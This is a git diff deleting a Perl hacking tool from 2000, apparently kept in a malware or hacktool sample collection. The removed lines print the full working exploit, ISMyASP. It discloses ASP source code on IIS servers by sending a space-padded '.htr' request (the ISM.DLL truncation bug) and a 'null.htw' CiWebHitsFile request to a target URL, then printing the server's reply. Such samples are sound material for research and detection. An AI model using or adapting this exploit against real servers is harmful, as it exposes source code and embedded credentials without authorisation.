diff --git a/Perl/HackTool.Perl.Aspviewer b/Perl/HackTool.Perl.Aspviewer deleted file mode 100644 index e6716a8f..00000000 --- a/Perl/HackTool.Perl.Aspviewer +++ /dev/null @@ -1,85 +0,0 @@ -#----------------------------------------------------------------# -# [ISMyASP] # -# IIS ASP source code viewer using ISM.DLL buffer truncation bug # -# and null.htw bug # -# LoWNOISE Colombia 5/2000 # -# Efrain 'ET' Torres et@cyberspace.org # -#----------------------------------------------------------------# -# Shoutz 2 f4lc0n & M43ztr0 <-- a gnu memb. # -#----------------------------------------------------------------# -# Some f() from wwwboard.pl by S.Sparling # -#----------------------------------------------------------------# - -use Socket; - -$port=80; - -if (!($ARGV[0])) { - print "\n[ISMyASP]\n"; - print "$0 http://host/view.asp \n"; - print "ET LoWNOISE Colombia.\n"; - exit; -} - -$url=$ARGV[0]; - -chop($url) if $url =~ /\n$/; -print "url: $url\n"; - -$remote = $url; -$remote =~ s/http\:\/\///g; -$remote =~ s/\/([^>]|\n)*//g; -print "host: $remote\n"; - -$path = $url; -$path =~ s/http\:\/\///g; -$path =~ s/$remote//g; -print "path: $path\n"; - - -$spaces=230; #THIS IS THE DEFAULT VALUE FOR ISM.DLL b.t - #REMEMBER THIS ATTACK ONLY WORKS ONLY 1 TIME - #READ THE CERBERUS CISADV000327. - -$submit = "GET $path"; - -$i=0; -while($i < $spaces) -{ - $submit= "$submit%20"; - $i++; - -} -$submit= "$submit.htr HTTP/1.0\n\n"; - -print "======Trying ism.dll buffer truncation...\n"; -print "submit: $submit\n\n"; - -&post_message; - -print "======Trying null.htw...\n"; -$submit="GET /null.htw?CiWebHitsFile=$path%20&CiRestriction=none&CiHiliteType=Full HTTP/1.0\n\n"; -print "submit: $submit\n\n"; - -&post_message; - -sub post_message -{ - if ($port =~ /\D/) { $port = getservbyname($port, 'tcp'); } - die("No port specified.") unless $port; - $iaddr = inet_aton($remote) || die("Failed to find host: $remote"); - $paddr = sockaddr_in($port, $iaddr); - $proto = getprotobyname('tcp'); - socket(SOCK, PF_INET, SOCK_STREAM, $proto) || die("Failed to open socket: $!"); - connect(SOCK, $paddr) || die("Unable to connect: $!"); - send(SOCK,$submit,0); - printf "\n======Waiting for reply [pray]....\n\n"; - while() { - print $_; - } - close(SOCK); -} - -print "\n\n======THE END. [LoWNOISE]\n"; -exit; -#:) narco.guerrilla&gov.sucks.co (huge :x to PO-K)